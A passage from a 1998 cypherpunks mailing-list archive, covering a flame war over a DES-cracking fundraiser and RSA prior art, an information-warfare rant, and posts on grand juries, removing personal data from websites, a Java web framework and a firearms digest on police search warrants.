>	The real Matt Blaze would not have 15 donors -- as Mr. Cordian
>reports -- but be stimied on how to get five more.
>
>	I wish Mr. Cordian well in his algebraic attack on DES -- but,
>unfortunately, he is not the real Matt Blaze. Not even a near-clone.
>
>	We could do with a few more professionals with Blaze's talent,
>energy, and integrity in general circulation.
>
>	Suerte,
>
>		_Vin
>
>-----
>"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
>good and ill... yet basically an intellectual construct, an idea, which by
>its nature will resist efforts to restrict it to bureaucrats and others who
>deem only themselves worthy of such Privilege."
>_ A Thinking Man's Creed for Crypto  _vbm.
>
> *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
>      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
>
>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Mon, 16 Nov 1998 01:51:46 +0800
To: cypherpunks@cyberpass.net
Subject: DES Trolls
Message-ID: <199811151736.LAA28829@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Vin McLellan, apparently not satisfied with only one flame, makes this
response to a very conveniently appearing anonymous remailer troll
saying something silly about Matt Blaze:
 
> The real Matt Blaze would also not be making these absurd and false
> claims that some mysterious "book" describing a cryptosystem identical
> or equivalent to the RSA public key cryptosystem was published "years"
> before Ron Rivest, Adi Shamir and Len Adelman first published their
> RSA PKC algorithm in April, 1977.  (It's well documented in the
> Cypherpunk archives, Codrian assures us;-)
 
Here the disingenuous Vin gives his own description of my prior post,
which he then proceeds to loudly refute, and I certainly didn't use
the word "identical" or the word "equivalent." I stated that
descriptions of "that which is now known as RSA" have appeared in
print, and that the one-way characteristics of the RSA trap-door
function were also previously known.
 
The arguments for invalidation of the RSA patent were based on two
central claims.  First, that work which contained similar material was
distributed by preprint and presented at conferences more than one
year before the RSA patent was applied for.  This would include the
Diffie-Hellman paper on "Multiuser Cryptographic Techniques", the
early Merkle-Hellman work, and the Pohlig-Hellman work.
 
The second claim that may be made against RSA is that the system is
"obvious." Support for this claim may be found in books dating all the
way back to the 19th century which discuss both the cryptographic
usefulness of one-way functions, and the factorization of the product
of two primes as one example of such a function.
 
Quoting "Cyberlaw":
 
    "There are a number of references in the prior art, moreover,
     to using the problem of factoring composite numbers in
     cryptography, dating back to the 19th century.
 
    "In 1870, a book by William S. Jevons described the
     relationship of one-way functions to cryptography and went
     on to discuss specifically the factorization problem used
     to create the "trap-door" in the RSA system."
 
> There was no such book. Cordian's statement is just not true.
 
Only a complete moron would place himself in the position of trying to
prove such an all-encompassing negative.
 
> (Actually, I'd bet that even Robert Hettinga knows that this is
> untrue.)
 
People_insulted_by_Vin_in_this_thread++;
 
> The real Matt Blaze would not have 15 donors -- as Mr. Cordian reports
> -- but be stimied on how to get five more.
 
If you had correctly read the FAQ, you would see that we have 5
sponsors, and 15 open sponsorships.  We are not stimied, we are
writing and debugging many thousands of lines of extremely complex
code, and do not wish to be distracted by further marketing activities
at this time.
 
> I wish Mr. Cordian well in his algebraic attack on DES
 
All together now.  "Bwahahahahahahhahaahah!"
 
This concludes my response to Vin, who may now return to his regularly
scheduled trolling lessons.
 
Now, if this weren't all hilarious enough, Matt Blaze, who is usually
smarter than this, feels an urgent need to leap in with...
 
> Whatever this is about, however, I assure you that any use of my name
> in connection with a solicitation for funds for some sort of
> "analytical DES cracking" effort, or any suggestion that I'm involved
> in such a project, is absolutely false and perhaps fraudulent.
 
Let me state for the record that the DES Analytic Crack Project has
made no claims about any of the prople working on it, other than that
they are competent implementors of complex algorithms.  Matt Blaze is
not associated with the project, and if any other crypto notables wish
a similar public statement made about them, they have only to email
and request it.
 
Sponsorships for the project are being solicited on the basis of the
statement of work in the FAQ, and work product to date.  They are not
being solicited based on any representation that various individuals
with recognizable names are associated with the project.  Anonymous
trolls making such allegations, followed by irate rebuttals by shills,
and scientists who should know better, are clearly an attempt at
disruption.  Continued such antics will be met with an appropriate
legal response.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 16 Nov 1998 01:55:58 +0800
To: cypherpunks@einstein.ssz.com
Subject: Link test [1432]
Message-ID: <199811151735.MAA05811@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



hi

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Nov 1998 01:43:21 +0800
To: cypherpunks@cyberpass.net
Subject: Non Explosive Weapons
Message-ID: <199811151721.MAA32349@smtp0.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Richard Danzig, new Navy Secretary, op-eds in the
NYT today about the threat of "Non Explosive Weapons 
(NEW)," posed by WMD and information warfare.

    http://jya.com/mil-panic.htm

He terms them "weapons of mass disruption" which
may lead to mass panic and will require the military and
law enforcement agencies to unite in a new kind of
US national defense, while, you bet, at the same time 
obeying law against domestic military operations.

In passing, he notes that the military has encryption
to protect itself against information attacks but that the
public and infrastructure does not. Cavalry to the
rescue.

Danzig's message is remarkably similar to the Kyl report
noted here a few days ago, and may indicate what's
long been coming in the way of deploying military
forces while falsely proclaiming Posse Comitatus
is being fulfilled. Or that the law is about to be
changed to meet the urgent threats of the Info Age,
media-decorted, to be sure, like WMD Freddy
or our own media-terrifying Toto.

Bruce Hoffman's recently published "Inside Terrorism," lays 
out the full panoply of outlaw and lawful terrorism, by groups 
and nations, cults and religions. Like the "Thugs" of India who 
killed 1 million over 1200 years -- an impressive persistence.

Hoffman claims that terrorism works in most cases. The reasons
why have been discussed here, though not his depth and
range of successes. And that the military seldom knows what
to do about it except to engage in even greater terrorism itself,
particularly against perceived supporters of the enemy.

That's food for thought for those calling for military protection
at home, whether by the military or the increasingly militarized
and armed LEAs and support agencies.

This linkage of WMD terrrorism and information threats 
appears to be the policy strategy to demonize information
in order to criminalize it. "Information threats" under this 
policy does not mean anything protected by the 1A or
WTO copyright, see how it works, is that clear motherfucker, 
do you need a missile in the head to get the point you fucking 
terrorist, read the NEWs, this aint TV Cops, Joe 6-Pack, it's 
high-tech GI Joe sapping your bunker, night-vision video 
rolling, family suicide by Semtex.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Nov 1998 01:43:33 +0800
To: cypherpunks@cyberpass.net
Subject: Non Explosive Weapons
Message-ID: <199811151724.MAA21167@smtp0.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Richard Danzig, new Navy Secretary, op-eds in the
NYT today about the threat of "Non Explosive Weapons 
(NEW)," posed by WMD and information warfare.

    http://jya.com/mil-panic.htm

He terms them "weapons of mass disruption" which
may lead to mass panic and will require the military and
law enforcement agencies to unite in a new kind of
US national defense, while, you bet, at the same time 
obeying law against domestic military operations.

In passing, he notes that the military has encryption
to protect itself against information attacks but that the
public and infrastructure does not. Cavalry to the
rescue.

Danzig's message is remarkably similar to the Kyl report
noted here a few days ago, and may indicate what's
long been coming in the way of deploying military
forces while falsely proclaiming Posse Comitatus
is being fulfilled. Or that the law is about to be
changed to meet the urgent threats of the Info Age,
media-decorted, to be sure, like WMD Freddy
or our own media-terrifying Toto.

Bruce Hoffman's recently published "Inside Terrorism," lays 
out the full panoply of outlaw and lawful terrorism, by groups 
and nations, cults and religions. Like the "Thugs" of India who 
killed 1 million over 1200 years -- an impressive persistence.

Hoffman claims that terrorism works in most cases. The reasons
why have been discussed here, though not his depth and
range of successes. And that the military seldom knows what
to do about it except to engage in even greater terrorism itself,
particularly against perceived supporters of the enemy.

That's food for thought for those calling for military protection
at home, whether by the military or the increasingly militarized
and armed LEAs and support agencies.

This linkage of WMD terrrorism and information threats 
appears to be the policy strategy to demonize information
in order to criminalize it. "Information threats" under this 
policy does not mean anything protected by the 1A or
WTO copyright, see how it works, is that clear motherfucker, 
do you need a missile in the head to get the point you fucking 
terrorist, read the NEWs, this aint TV Cops, Joe 6-Pack, it's 
high-tech GI Joe sapping your bunker, night-vision video 
rolling, family suicide by Semtex.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 16 Nov 1998 02:18:01 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can (fwd)
In-Reply-To: <199811120446.WAA27641@einstein.ssz.com>
Message-ID: <Pine.BSF.3.91.981115125343.17485A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 11 Nov 1998, Jim Choate wrote:

> Forwarded message:
> 
> > Date: Wed, 11 Nov 1998 20:52:06 -0500
> > From: Petro <petro@playboy.com>
> > Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can
> >  call it that) [CNN] (fwd)
> 
> > 	Jim, "Grand Jury", a jury to see if there is enough evidence to
> > warrant a full trial.
> > 
> > >Irrelevant, one doesn't throw away the justice system because it might have
> > >been abused. One wrong does not justify another.
> > 
> > 	Correct, but this isn't a guilty or innocent trial, this is a "is
> > there enough evidence to try this person" type trial.
> > 
> > 	This judge can't throw the perp in jail, only throw another trial
> > where there will be 12 to judge.
> 

What part of Petro's response did you fail to understand? THe "elder 
Kennedy" is not on trail. A grand jury is convened to determine if enough 
evidence exists to bring trail. Those brought before a grand jury are 
almost always witnesses, or potential witnesses, as is the elder Kennedy.

A grand jury hearing and a criminal trail are two completely seperate 
processes. All the grand jury can do is determine whether or not to 
indite, whereupon the accused has the right to a fair trail before a jury 
as you state.

Anyway, the injustice in this matter is that the two most likely 
suspects, who were both dating the victim up to her death, have never 
been brought to trial. Just another abuse by america's "royal family."

The murder weapon was a golf club belonging to, as I recall, the father 
of one of the boys. Both boys were seen with her on the night of her 
death. No trial for over twenty years, plenty of expensive legal 
manuvering to prevent one. And now Jim complaining that a single judge is 
insufficient to determine if an inditement should be handed down.

Perhaps prof. Froomkin is reading the list and can pass on an informed 
legal opinion? I've never seen any regulations baring a judge from 
serving in the capacity of a grand jury, OTOH, IANAL.

-r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 16 Nov 1998 05:48:10 +0800
To: Rabid Wombat <rah@shipwright.com>
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
In-Reply-To: <v04020a09b2741a85d154@[139.167.130.246]>
Message-ID: <v0311072fb274e6e4594f@[209.109.232.44]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:27 AM -0700 11/15/98, Rabid Wombat wrote:
>No, but could Bob Hettinga be Vin McLellan's sock puppet?

Having met both of them (in the same room yet), not bloody likely.  :-)


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 16 Nov 1998 02:37:16 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
In-Reply-To: <v04020a09b2741a85d154@[139.167.130.246]>
Message-ID: <Pine.BSF.3.91.981115132212.17485C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




No, but could Bob Hettinga be Vin McLellan's sock puppet?


On Sun, 15 Nov 1998, Robert Hettinga wrote:

> :-)
> 
> Bwahahaha!
> 
> Isn't this fun???
> 
> Cheers,
> Bob Hettinga
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 16 Nov 1998 03:33:06 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
In-Reply-To: <v04020a09b2741a85d154@[139.167.130.246]>
Message-ID: <v04020a0db274d064b246@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:27 PM -0500 on 11/15/98, Rabid Wombat wrote:


> No, but could Bob Hettinga be Vin McLellan's sock puppet?

Um, it's *meat* puppet, Rab, meat puppet...

Or, better, "Bwahahahahahahah!"


Seriously. Like most normal people, I hate saying facially outrageous
things in well-known watering holes and being wrong, but it's particularly
annoying when you're consistantly ambushed by self-appointed, um, holes of
another kind. Vin did this kind of vigorous error correction on me twice
now, on my own turf, in the past three weeks. Not only were both flames
about two standard deviations outside the bounds of altruistic desires to
correct the record, which even *I* can excuse once in a while ;-), this
kind of silly dreck is getting to be a positive habit with Mr. McLellan. I
mean, Socrates was right, and all that, but he was also a pain in the ass.


I fixed my problem with Mr. McLellan this morning, though. Mr. McLellan can
crusade against threats to his world view on someone else's list, I figure.


So, yup, mea fucking culpa. As Frank Lloyd Wright was fond of saying when
he'd been caught in a stretcher, or at least vigorously propounding an
error, "Well. There you are!"


Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 16 Nov 1998 15:44:35 +0800
To: Jason Burton <cypherpunks@toad.com>
Subject: Re: Privacy and the internet
In-Reply-To: <199811140949.BAA21751@toad.com>
Message-ID: <3.0.5.32.19981115145719.00944580@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:46 AM 11/14/98 -0500, Jason Burton wrote:
>Does anyone know what I should do if someone was posting sensitive
>information on a website?
>And what if the webmaster of the domain doesnt respond to the request for
>removal of information.
>IS there something that say's what is and isn't able to be published
>"personal information" on the internet.
>If someone can reply I'd appreciate it.
>Seeking council.

They don't call this The Net Of A Million Lies for nothing :-)

Depends substantially on what kind of information it is,
what jurisdictions you, the web site, and the poster are in,
and whether you're interested in seeking legal counsel
as well as just hacker advice.  IANAL, but there are a range
of torts from libel or slander to invasion of privacy to
emotional distress that sometimes apply, if you're into
that sort of approach; if the person the information is about
is a public figure, this seldom works, and if the information
is true, you've also got a much more limited case.

Alternatively, there's the Big Gun Flame War approach of 
making sure everyone knows what an unresponsive loser the 
web site providers are, though that does lose the opportunity to quietly 
get the information to go away, even if it hasn't already been
sucked down by Altavista, Yahoo, Hotbot, and DejaNews.

Most web sites are either on big commercial hosting sites with
relatively responsive abuse@wherever contacts, or else they're
smaller sites which get connectivity and/or hosting service
from larger providers.  So find out who their upstream providers are,
and talk with them about their customer.  
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 16 Nov 1998 05:06:01 +0800
To: cypherpunks@cyberpass.net
Subject: Plug: Check out wasp.org...
Message-ID: <v04020a10b274ea038410@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



http://www.wasp.org/ is a site which belongs to WASP's author, and DBS and
DCSB member, Steven Smith.

When it's finished, the current version is about 70%-there alpha, WASP will
be an open source web application delivery platform written in JAVA for
XML/HTML.

Steve and I were talking about using WASP for digital commerce, financial
cryptography, and dbts applications Friday night, at Anthony's Pier 4,
during the Constitution Yacht Club awards banquet.

(Naw, not *that* kind of yacht club. CYC, while I'm plugging things, for
those of you who sail in Boston, charges all of $75/yr, and it mostly does
<very friendly, but hotly contested :-)> 'round-the-bouy races and
cookouts, all out of a one-room prefab houseboat clubhouse tied up at the
Constitution Marina in Charlestown. Steve graciously answered a cattlecall
on the DCSB list for crew this summer, and now does foredeck on Corisan,
the 1968 Columbia 38-footer a bunch of us old farts race on every Thursday
night in Boston harbor, when it's warm enough to, anyway.)

So, seeing that WASP is still being built, and Steve is crypto-clueful, I
thought I'd spam the crypto community (and a few others :-)) about WASP so
that Steve could get some comments on what he has now, and requests for new
stuff he can add to WASP. And, of course, since it's open source, to
solicit WASP additions, if WASP indeed doesn't suck, both crypto and
otherwise, from other clueful people both inside the country and otherwise.
:-).

The following is from Steve's FAQ on WASP, sans links, so it might read
strangely here in text.

Cheers,
Bob Hettinga


> 1.  What is the WASP?
>
> The WASP is an OpenSourceTM platform (library) for developing complex web
>applications.  It is written in Java and runs under any system which will
>support the Java Servlet API.  (eg. Sun's JavaWebServer, Apache (via Live
>Software's JRun), NetScape, IIS and others.)
>
> The current version is: 0.7a.  Download it now.  I think this is 70% to a
>1.0 release.   0.8a will be out by 11/16 and will include the
>DataAccessObject (org.wasp.data.*).
>
> 2. How does the WASP work?
>
> The WASP parses .wasp files which consist of standard HTML and some
>additional XML tags that are used to control the behavior of the WASP.
>All .wasp files should be consistent with XML syntax.  The WASP allows you
>to add new tags and functionality easily.  The default set of tags provide
>standard script features, including:  variable substitution, conditional
>processing, looping, dynamic SQL queries (for prototyping only),
>interfaces to Data Access Objects, etc.  Session management is provided by
>the underlying Servlet API and WASP applications have access request,
>session, and global namespaces. See the Javadoc.
>
> 3. Who can use the WASP?
>
> Anyone can use it for Free!  Better yet, you can download the source.
>The WASP is released under the Library General Public License (LGPL), so
>if you make any improvements to the WASP, the results must be free as
>well.   WARNING:  This software is still alpha stage.  It works, but there
>are no Makefiles or INSTALL instructions yet.  You're on your own. An
>example .wasp page will be posted soon.
>
> 4. Why would I want to use the WASP?
>
> That is probably the subject for an entire whitepaper which I don't have
>time to write.  I wrote this software because all the methods I have found
>for developing web applications suck in some way or other.   Even
>monumental OpenSource treasures like Apache and Perl leave something to be
>desired when considering a complex application.  Before I go trashing
>everyone else's stuff though, let me tell you why The WASP doesn't suck:
>
> It is easily extended so you can make it do whatever you want. It is
>written in Java so you can use any server OS or Database. It seperates
>HTML from SQL and Java application logic, thereby allowing designers to
>design and programmers to program. It is fast and scaleable.  It will run
>well enough on your hopped up 486 linux box and it will scream on your 10
>CPU Sparc Mega Server.  If you run NT, I'm sure it'll work there too.
>(Shame on you for wasting good hardware!) It encourages the development of
>reusable business objects. It can talk to dynamic data sources/services
>that are not SQL-Based!  (Important for complex distributed object
>applications.) It is OpenSource, so when you run into a bug, you can fix
>it! It is comprehendable by any experienced object programmer.  (Only
>~3000 lines of code) It is Free!
>
> 5. What's wrong with the other stuff?
>
> The other standard methods for developing web apps all suffer from one or
>more of the following:
>
> They involve editing single files containing 5 or more programming
>lanugages, all with different syntax, and which execute in 5 different
>places at 5 different times. They require you to surf the tech-support
>websites of your tools vendors hoping for clues to some bug. They yield
>unmaintainable / throwaway solutions. They tie you to a single vendor's
>hardware, operating system, or database. They force you to use some arcane
>GUI environment to create your "application".   This process always feels
>like Voodoo to me. M1CR0S0F4 R00LZ D00D!!!1!!1!. They cost money whether
>they work well or not.
>
> 6. What can I do for the WASP?
>
> I will be setting up a database here soon to keep track of a wishlist,
>bugs, etc.  In the meantime, consult the source code and look for XXX in
>the comments.  These indicate areas that need work.  Obviously, general
>stuff like cleaning up error paths/exception handling would help.   Anyone
>with experience in the area of Enterprise Java Beans who could offer
>suggestions on how to implement the Data Access stuff in the approved Java
>framework would be greatly appreciated.  I understand the EJB isn't baked
>yet.  I guess I'll buy a book on it after I finish the contract I'm on.
>
> After the Parser is reworked, the Page cache might be reworked to
>serialize and write to disk or use some persistant store.  The WASP caches
>pages to avoid expensive parsing but I haven't yet measured how much
>memory this uses.  (RAM sure is cheap these days!)
>
> Also, if you really want a pure OpenSource stack of software, someone
>needs to implement an OpenSource servlet runner.  That is truely a
>"chasing taillights" problem (as the Halloween Document put it) so it
>should be easily enough accomplished.  If no one steps up to plate, maybe
>I'll get around to it, but don't hold your breath.  I'm enjoying writing
>WASP applications too much!
>
> There is a net-CVS repository for the WASP code.  Read-only access has
>not been set up yet.  Contact steven.t.smith@pobox.com to obtain access.
>
> 7. What about the LGPL and Java Virtual Machine?
>
> I'm no licensing expert.  Ostensibly, I want this program to be freely
>used and improved while not enriching the lawyers, taxmen and all the
>other parties that surround commercial software.  Mostly, however, I want
>to share this cool program with my friends.  If anyone else can use it,
>that would be great!  If anyone could help me debug it, that would be even
>greater!  That's why I chose to OpenSource.
>
> What exactly defines a program running inside a JVM is not immediately
>obvious.  I just assumed that Java classes are all kind of like libraries.
>That's why I chose to use the LGPL.
>
> In my view, the WASP consists of every class in the org.wasp.* heirarchy.
>I don't consider any Data Access code that is specific to your
>website/application and which may be "linked" into the WASP at runtime, to
>be "part of" of the WASP or create some kind of derivative work.  If you
>do write additional Taglets which are of general use, I expect those to be
>included in the WASP.  This is sort of "enforced" by Taglets registering
>themselves via code in the main org.wasp.engine.Servlet.init(), thereby,
>in my view, making them part of the WASP.  Data Access stuff that is
>custom to your application can be configured in via initialization
>parameters and thusly not considered to be part of the WASP.
>
> For what it's worth, the more you poke around this stuff, the more you
>realize that Software isn't a THING at at all.  All those phantasms people
>use to think about it are simply anachonistic hold-overs from industrial
>era, scarcity thinking.  Software Licenses and the businesses they support
>begin to look like so many Voodoo incantations and pointless
>pontifications about angels on the head of pin.  Or worse, they seem like
>the rules of a silly boardgame which is played with real money, and in
>which the house (government, lawyers, VCs, Investment Banks and corporate
>shareholders) always wins. Casinos at least offer better odds.  I believe
>a programmer is better off figuring out how to get people to actually use
>and propagate code in ways that enrich each of us individually and empower
>individuals generally.
>
> 8. Who wrote it?
>
> Me. (steven.t.smith@pobox.com)  And whoever I could sucker into helping
>me. ;-)  See the CONTRIBUTORS file for details.
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Mon, 16 Nov 1998 08:35:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: U.S. Attorney Morgenthau on Money Laundering
Message-ID: <19981115235850.2195.rocketmail@send102.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Can't blame the Feds for this one; Morgenthau is actually the District
Attorney for Manhattan, not the U.S. Attorney.  My bad.
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 16 Nov 1998 09:26:11 +0800
To: "Toronto Star" <Martin.P@parl.gc.ca>
Subject: Search and Seizure abuse...
Message-ID: <199811160059.TAA27744@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Note to elected officials: please inquire on this event an reply.
Thanks 

JFA


========== forwarded from the Canadian Firearms Digest, V2 #701 ========
Date: Sun, 15 Nov 1998 15:23:49 -0600
From: Marstar <marstar@hawk.igs.net>
Subject: Re: Cdn-Firearms Digest V2 #699

I WOULD LIKE TO ADD MY TWO CENTS WORTH, THIS IS A VERY SENSITIVE
SUBJECT WITH US....

1. Ask to see the search warrant.
NFA: The searchers are required to SHOW you a COPY of the warrant or
TELL you what is in it before executing it, and LEAVE you a copy of it
when they leave..

100% RIGHT, BUT WHEN THE PERSON POINTING THE MP-5 AT YOU TELLS YOU
TO SHUT-UP AND MOVE AWAY, WHAT WOULD SUGGEST ??

2. Ask the person in possession of the warrant to identify himself and
all of those with him and to indicate whether those persons are
authorized to aid in the execution of the warrant.

WITH 40 PEOPLE ALREADY TEARING THINGS APART AND AN ENTIRE SWAT
TEAM ON HAND HOLDING YOU AND YOUR EMPLOYEES AT GUNPOINT, THEY REFUSE TO
IDENTIFY THEMSELVES, HOW SHOULD WE IMPRESS THEM WITH OUR DEMANDS ??

TO ADD A BIT OF CHALLENGE TO THE AFFAIR MOST OF THE PEOPLE WERE IN
CIVILIAN CLOTHES AND WORE NO ID....MOST OF THE TRUCK AND CARS WERE
UNMARKED.... HAD WE NOT TAKEN PICTURES WE WOULD NOT EVEN KNOW WHO HAD
"VISITED" US.


3. Request time to review the warrant and to obtain advice with
respect to the appropriate course of conduct.

EXCELLENT IDEA, WHEN I REACHED FOR THE PHONE TO CALL OUR LAWYER
TWO OF THE SWAT TEAM SMEMBERS WITH MP-5s POINTED AT ME INSTRUCTED ME "TO
GET THE HELL AWAY FROM THE PHONE" THE FACT THAT I TOLD THEM I WANTETO
CALL MY LAWYER DID NOT SEEM TO IMPRESS THAT AT ALL....

AS FOR HAVING TIME TO REVIEW THE WARRANT, THEY DID NOT SEEM INTERESTED IN
HEARING ANY ARGUMENTS ON THE SUBJECT....

IS THERE SOME OTHER APPROACH I SHOULD HAVE USED ??

4. Read the warrant carefully to determine: the premises covered

WE ADVISED THE OFFICER IN CHARGE THAT THIS WAS INCORRECT...."NOT
IMPORTANT" WAS THE REPLY

the specific documents or objects it covers

WE ALSO ADVISED THEM OF THE ERRORS IN THIS SECTION...."IT DOES NOT
MATTER" REPLIED THE ONE IN CHARGE OF THE RAID....

 the alleged offence(s) subject of the warrant

NEW:  Read the DATE and TIMES that the warrant authorizes search. 

THESE POINTS WERE CORRECT....

Often, the warrant is invalid because they were supposed to do the
search YESTERDAY, or EARLIER TODAY, and entry can then be legally
refused.  CC s.  488 forbids the execution of a search warrant AT
NIGHT, unless "(a) the justice [who issues it] is satisfied that there
are reasonable grounds for it to be executed by night, (b) the
reasonable grounds are included in the Information [laid before the
justice to get the warrant], AND (c) the warrant authorizes that it be
executed by night."

5. At the same time that the warrant is being reviewed, instruct
someone to make the following calls (if not already made):
legal counsel 

I INDICATED ABOVE WHAT HAPPENED WHEN WE
ATTEMPTED TO USE THE PHONE, WE WERE SOME TIME INTO THE SEARCH BEFORE MY
WIFE WAS ABLE TO CALL OUR LAWYER....

individuals named in the warrant whose offices are to be searched
each should be advised that the search is pending and cautioned
that they must not remove, alter or destroy any documents or other material
in their offices.

HEY THAT MANY PEOPLE CARRYING SUB MACHINE GUNS,
SHOTGUNS, STUN GRENADES, HANDGUNS, ETC, ETC....HAVE MY INSTANT OBEDIENCE
ASSURED....
>NFA: ADD the local news media

GOOD LUCK, IN OUR CASE THEY CLOSED OFF OUR ROADWAY AND TURNED AWAY
EVERYBODY WHO SHOWED UP....
FEW PEOPLE APPRECIATE THE "HOSPITALITY" OF ARMED POLICE AT YOU GATE....

>NFA: ADD NFA HQ: (403)439-1394 or NFA- (add prov.branch # here

WE WERE UNABLE TO CONTACT THE NFA FOR SEVERAL HOURS....


>NFA NOTE:  If told that you must sit down and not use the phone, ask:
"Am I under arrest?"  If the answer is "No, not YET!" then no one has
any right to TOUCH you, or to hinder your use of the telephone. 

WE TRIED THAT APPROACH BUT I'M A CHICKEN AT HEART, TWO MP-5s
POINTED AT MY MID-SECTION MADE ME THAT WAY....

 If an officer DOES touch you, then ask again: "Am I under arrest?"  If
the answer is no, then say:  "In that case, take your hand off me -- or I
will arrest YOU for assault."  [Yes, you ARE authorized to do that by
Canadian law, CC s. 494(1) and (3)].

6. Do not "agree" that the search can be expanded beyond the limits
described in the warrant. 

IN OUR CASE THEY DID ABSOLUTELY AS THEY PLEASED, THEY HAD GUNS AND
WE DID NOT....

7. Do not answer any substantive questions.
NFA: More people are convicted from what they SAY than from any other
cause.  You have a right to SILENCE.  USE IT.  Unless you know as much
about firearms law as the NFA does, you have NO IDEA whether or not
you ARE guilty - -- because you may SEEM to be guilty, and yet the NFA
can often tell your lawyer why you are NOT.  

YOU ARE QUITE RIGHT, KEEP YOUR MOUTH SHUT....

8. Do not attempt to impede, physically or ot otherwise, the person
executing the warrant.  NFA: That is obstruction, and a criminal offence.

AND IF YOU HAVE A PUMPED UP BUNCH OF PEOPLE CARRYING AUTOMATIC
WEAPONS WITH FINGERS ON THE TRIGGER DON'T EVEN THINK OF GIVING THEM A
PROBLEM.... THESE PEOPLE WILL SHOOT FIRST AND ASK QUESTIONS LATER....THEY
PROVED THAT ON A NUMBER OF RAIDS IN THE PAST FEW YEARS....

9. If any documents exist in respect of which solicitor-client
privilege may exist, identify the documents and their location and
indicate to the search officer that the documents are subject to
solicitor-client privilege and that you require that the appropriate
procedures be followed to protect the privilege.

OH YEAH, THAT IS GAURANTEED TO IMPRESS THEM, HELL WE EVEN HAVE
PICTURES OF AN OFFICER STEALING DOCUMENTS....

10. Keep an accurate log (or copy) of all documents seized.   NFA: the
searchers are required to file an "Information" with the court to get
a search warrant.  Unless the justice blocks it, the "Information" is
a public document. After executing the warrant, the searchers must
file a "Return" with the court, explaining what they did with the
warrant and listing what they took.  SO: After being searched, go to
the court that issued the warrant and request a copy of the
Information and Return relating to that warrant.  You should be able
